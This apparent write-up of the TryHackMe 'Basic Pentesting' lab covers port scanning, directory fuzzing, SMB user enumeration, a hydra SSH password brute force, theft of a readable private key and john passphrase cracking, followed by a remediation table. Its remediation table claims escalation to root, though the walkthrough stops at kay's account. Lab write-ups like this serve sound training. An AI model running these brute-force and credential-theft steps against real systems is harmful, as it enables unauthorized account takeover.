Basic Pentesting
Platform : TryHackMe
Type : boot2root
Difficulty : ⭐⭐☆☆☆
Table of contents
Reconnaissance
Nmap scan
# Nmap 7.92 scan initiated Tue Oct 4 15:59:27 2022 as: nmap -A -p- -oN nmapResults.txt 10.10.71.111
Nmap scan report for 10.10.71.111
Host is up (0.033s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-10-04T13:59:53
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown< (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2022-10-04T09:59:53-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 4 15:59:55 2022 -- 1 IP address (1 host up) scanned in 27.98 secondsWeb reconnaissance
Gobuster fuzzing
Using Gobuster, we can perform directory fuzzing :
┌──(attacker㉿attackbox)-[~/Bureau/Basic_Pentesting]
└─$ gobuster dir -u http://10.10.71.111/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobusterResults.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.71.111/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/10/04 17:30:39 Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 318] [--> http://10.10.71.111/development/]
Progress: 4079 / 220561 (1.85%) ^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/10/04 17:30:53 Finished
===============================================================One directory named development. It is promising since functionnality still in development may contain unpatched vulnerabilities or even disclose sensitive information.
Question : What is the name of the hidden directory on the web server ?
Answer : development
Manual reconnaissance
By navigating to the discovered directory, we notice directory listing is enabled, disclosing two text files :
The first one, dev.txt, does not contain sensitive information. The only useful information we can get are the two usernames initials :
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -JThe second one, j.txt, contains a sensitive information related to the password of « J » :
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-KIt says « K » successfully cracked « J »‘s password while auditing /etc/shadow. This indicates « J » is using a weak password and we may be able to brute-force it through SSH. But first, we need to find valid usernames.
SMB reconnaissance
SMB is running on the target system, so we may be able to enumerate local usernames via RID cycling using enum4linux :
┌──(attacker㉿attackbox)-[~/Bureau/Basic_Pentesting]
└─$ enum4linux 10.10.71.111
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct 4 17:38:34 2022
=========================================( Target Information )=========================================
Target ........... 10.10.71.111
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
<SNIP>
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
<SNIP>We have found two users while enumerating SMB. The user kay and the user jan which matches the initials we saw in the text files we found earlier. We know that « J » (so jan) was using a weak password, and may still not have changed it.
Question : What is the username ?
Answer : jan
SSH brute-force
Since jan may still be using a weak password, we may be able to successfully brute-force it on the SSH service using hydra :
┌──(attacker㉿attackbox)-[~/Bureau/Basic_Pentesting]
└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.71.111 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-10-04 17:47:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.71.111:22/
[STATUS] 156.00 tries/min, 156 tries in 00:01h, 14344245 to do in 1532:31h, 14 active
[STATUS] 113.67 tries/min, 341 tries in 00:03h, 14344060 to do in 2103:15h, 14 active
[STATUS] 102.29 tries/min, 716 tries in 00:07h, 14343685 to do in 2337:12h, 14 active
[22][ssh] host: 10.10.71.111 login: jan password: armandoThe brute-force attack was successful, and we have now the password for jan‘s user account. We can now login via SSH :
┌──(attacker㉿attackbox)-[~/Bureau/Basic_Pentesting]
└─$ ssh jan@10.10.71.111
jan@10.10.71.111's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Tue Oct 4 11:01:38 2022 from 10.8.95.171
jan@basic2:~$Question : What is the password ?
Answer : armando
Question : What service do you use to access the server ?
Answer : SSH
Post-exploitation
Local reconnaissance
Looking at the /home directory, we notice we have read access to kay user directory :
jan@basic2:~$ cd ..
jan@basic2:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Apr 19 2018 .
drwxr-xr-x 24 root root 4096 Apr 23 2018 ..
drwxr-xr-x 2 root root 4096 Apr 23 2018 jan
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kayListing files and directories in it, we notice the presence of a .ssh directory, which we have read access to. This directory normally contains the SSH public key, but may also contain the private key :
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 798 Oct 4 11:12 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfoInside .ssh, there is indeed a private key stored in id_rsa, and we also have read access to it :
jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pubWe can read the file using cat and copy it to a local file on our attacking host :
jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
XRvjw/HRiGcXPY8B7nsA1eiPYrPZHIH3QOFIYlSPMYv79RC65i6frkDSvxXzbdfX
AkAN+3T5FU49AEVKBJtZnLTEBw31mxjv0lLXAqIaX5QfeXMacIQOUWCHATlpVXmN
lG4BaG7cVXs1AmPieflx7uN4RuB9NZS4Zp0lplbCb4UEawX0Tt+VKd6kzh+Bk0aU
hWQJCdnb/U+dRasu3oxqyklKU2dPseU7rlvPAqa6y+ogK/woTbnTrkRngKqLQxMl
lIWZye4yrLETfc275hzVVYh6FkLgtOfaly0bMqGIrM+eWVoXOrZPBlv8iyNTDdDE
3jRjqbOGlPs01hAWKIRxUPaEr18lcZ+OlY00Vw2oNL2xKUgtQpV2jwH04yGdXbfJ
<SNIP>
-----END RSA PRIVATE KEY-----When trying to use this key to login as kay via SSH, it asks for a passphrase :
┌──(attacker㉿attackbox)-[~/Bureau/Basic_Pentesting]
└─$ nano kay_rsa
┌──(attacker㉿attackbox)-[~/Bureau/Basic_Pentesting]
└─$ chmod 600 kay_rsa
┌──(attacker㉿attackbox)-[~/Bureau/Basic_Pentesting]
└─$ ssh kay@10.10.71.111 -i kay_rsa
Enter passphrase for key 'kay_rsa':Using ssh2john, we can extract a crackable hash from the private SSH key :
┌──(attacker㉿attackbox)-[~/Bureau/Basic_Pentesting]
└─$ ssh2john kay_rsa > kay_rsa.hash
┌──(attacker㉿attackbox)-[~/Bureau/Basic_Pentesting]
└─$ john kay_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (kay_rsa)
1g 0:00:00:00 DONE (2022-10-04 18:02) 4.347g/s 359791p/s 359791c/s 359791C/s bird..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.The hash was successfully cracked, revealing a weak passphrase. The private key can now by used :
┌──(attacker㉿attackbox)-[~/Bureau/Basic_Pentesting]
└─$ ssh kay@10.10.71.111 -i kay_rsa
Enter passphrase for key 'kay_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Tue Oct 4 11:10:51 2022 from 10.8.95.171
kay@basic2:~$We are now logged in as kay, let’s get the flag in pass.bak :
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
<REDACTED>Question : What is the final password you obtain ?
Answer : <REDACTED>
Vulnerability summary
Information disclosure
| Field | Value |
|---|---|
| Affected component | Web server |
| CVSS 3.0 score | 5.3 (Medium) |
| CVSS 3.0 vector | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| Impact | Sensitive information was found in text files stored on the web server. The information stored in those files was used to successfully perform other attacks against the target system. This has a low impact on the confidentiality. |
| Remediation | Those files should not be stored on publicly available web applications, mostly when it’s private conversations. It is recommended to remove them from the web server. Also, the development directory has directory listing enabled. The web server configuration should be reviewed and directory listing should be disabled where not needed. |
File permission misconfiguration
| Field | Value |
|---|---|
| Affected component | Kay‘s SSH private key |
| CVSS 3.0 score | 7.5 (High) |
| CVSS 3.0 vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| Impact | The SSH private key of kay user was readable by everyone. This allows an attacker with access to any other user account to read it and compromise kay user account.This has a high impact on the confidentiality. |
| Remediation | Ensure SSH private keys have the permissions set to 600 (only accessible to the owner) and are owned by the user they were generated for. |
Weak password policy
| Field | Value |
|---|---|
| Affected component | User accounts |
| CVSS 3.0 score | 9.8 (Critical) |
| CVSS 3.0 vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Impact | Multiple passwords / passphrases were successfully brute-forced or cracked, revealing a weak password policy. This allows an attacker to gain access to some user accounts and use them to remotely access the system via SSH. This has a high impact on the confidentiality, availability, and integrity of the entire system since it allowed privilege escalation to the root account. |
| Remediation | Enforce a strong password policy to reduce the risk of successful brute-force or password guessing attacks. This policy should include: – A minimum password length of at least 12 characters – Complexity requirements, such as the inclusion of uppercase letters, lowercase letters, numbers, and special characters – A password blacklist, preventing the use of common or previously compromised passwords – Periodic password changes, especially for privileged accounts – Account lockout mechanisms after a defined number of failed login attempts – Monitoring and alerting for repeated failed login attempts to detect brute-force attacks Users should also be discouraged from reusing passwords across different services to prevent lateral movement in the event of a compromise. It is also recommended to setup a brute-force protection system such as fail2ban to block malicious IPs. |